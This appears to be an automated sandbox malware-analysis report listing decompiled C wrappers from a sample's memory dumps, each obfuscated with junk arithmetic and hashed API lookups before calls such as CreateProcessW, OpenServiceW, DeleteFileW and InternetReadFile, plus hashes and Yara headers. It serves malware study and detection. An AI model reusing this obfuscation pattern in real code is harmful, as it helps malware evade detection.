                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 19018072A00108BFEB14DF95DC0A8DFBFB6EF48750F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E001E602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E001F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001EC762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 6944b5eda7ddc599a285dfadfb83d98871e35aac18c3631d2d2e62f16343f5b4
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: DC1133B290122DBBCB25DF95DC498EFBFB8EF14754F108188F90962220D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E001E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E001E602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E001F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 001E1096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e6c4d22095a37846949824c43428ebcba9464efa8f5f78c7bbe982629098abf5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: 96015BB6D0170CBBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E001E4859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E001F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 001E48B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: db10be173d78d936ff7409dc4a61335d5f4ce6dd59e8ceb58d4ae770844ed64b
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 6FF0F4B0A05209BBDB04CFE8CA5699EBFB9AB40301F208188E444A7290E3B15F509A50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E001F4F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E001F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 001F4FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: 3a5fbf3e33bfcad55dc1fab4b82b1efc569f49ed361eebb7fe294ba9cd13fcc4
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 50F037B081120CFFDB04EFA4D94289EBFBAEB44340F208299E804AB261D3715B509B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E001F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001E602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E001F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(001E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001E591A), ref: 001F9816
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 86c2c147634ef3138d853ec8a87c4843de297417a20e506b2cc7360b5490e1f8
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: 1D11B372901188BBDF1A9FD6DC0ACDF7F7AEF99750F104148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E001EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E001E602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E001F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(001F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,001F0668,?,?,?,?), ref: 001EB5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: 64c03b7127ba3bee54388474f9df1fc94ff169f200a39c6328bbd3ed7b90b682
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: 2A11C372801248BBDF16DF95DD06CEE7F7AFF99714F148198FA1862120D3729A60EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E001F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E001E602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E001F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001E87F2,0000CAAE,0000510C,AD82F196), ref: 001F989B
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 1bf3bad15c3aece8f2b403b3292d11e26047bfd38b1ea934f0c7b56989d86508
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 0B019A72801208FBDB04EFD5D846CDFBF79EF95750F108188F908A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E001F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E001F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 001F7C67
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: ce09fedc50eca9e1d2d8f728837780fab95cf825b4c8fb3014b54b06bea60826
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: E5014FB190120CFFEB09DF94C84A8DE7BB9EF54314F108198F505A7250E7B15F509B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E001EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E001F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001EF6D8
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction ID: 8d5c33ce5b49c7f96cbb9769759cca5bbcc1b768e543c718b67643f59ff8d05f
                                                      • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                                      • Instruction Fuzzy Hash: C001E5B690120CBBEF05AF94DC068DF7F79EB15364F148188F90462251D7B25E61DBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E001E602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E001F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001EB759
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction ID: f9da5785dbd9570073441e0a55d7972b48b4dfa7cb78d73ba810e2c20631ceef
                                                      • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                                      • Instruction Fuzzy Hash: 4A0128B694130CFBEB45DF94DD06A9E7BB5EB18704F108188FA09661A1D3B25A20AB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E001FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E001F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001FAAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction ID: ae75e7940aa0f3f516375c71d7746bc297ccf3d88e33e1714b6200cce300473c
                                                      • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                                      • Instruction Fuzzy Hash: 0CF069B190020CFFDF08EF94DD4A89EBFB8EB44304F108188F905A6261D3B29B549B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E001E5FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E001E602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E001F07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001E6025
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2118908713.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true
                                                      • Associated: 0000000D.00000002.2118891780.00000000001E0000.00000004.00000001.sdmp
                                                      • Associated: 0000000D.00000002.2118954046.00000000001FC000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction ID: f4d9d5f24093db104dc701dd67091ce2778e05ea5050f4393f3df9c3ed5d6a3d
                                                      • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                                      • Instruction Fuzzy Hash: 38F04FB0C1120CFFDB08DFA0E94689EBFB8EB50340F208198E909A7261E7715F559F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Executed Functions

                                                      C-Code - Quality: 52%
                                                      			E0023023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t25;
                                                      				int _t31;
                                                      				void* _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t37 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0022602B(_t25);
                                                      				_v12 = 0x4c1d;
                                                      				_v12 = _v12 ^ 0x5ad90362;
                                                      				_v12 = _v12 ^ 0x5ad955af;
                                                      				_v8 = 0xc5f7;
                                                      				_v8 = _v8 * 0x75;
                                                      				_v8 = _v8 ^ 0x98520be0;
                                                      				_v8 = _v8 + 0xd998;
                                                      				_v8 = _v8 ^ 0x98094817;
                                                      				E002307A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
                                                      				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
                                                      				return _t31;
                                                      			}









                                                      APIs
                                                      • InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 002302BC
                                                      Strings
                                                      • e list for clipped items, xrefs: 00230269
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileInternetRead
                                                      • String ID: e list for clipped items
                                                      • API String ID: 778332206-922771492
                                                      • Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                                      • Instruction ID: 8d387dc263cce60f7cc9c4100b27cb2b13a79d7000d8c7178615b53cf0ed6910
                                                      • Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
                                                      • Instruction Fuzzy Hash: E4012976911208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D3729F61AB90
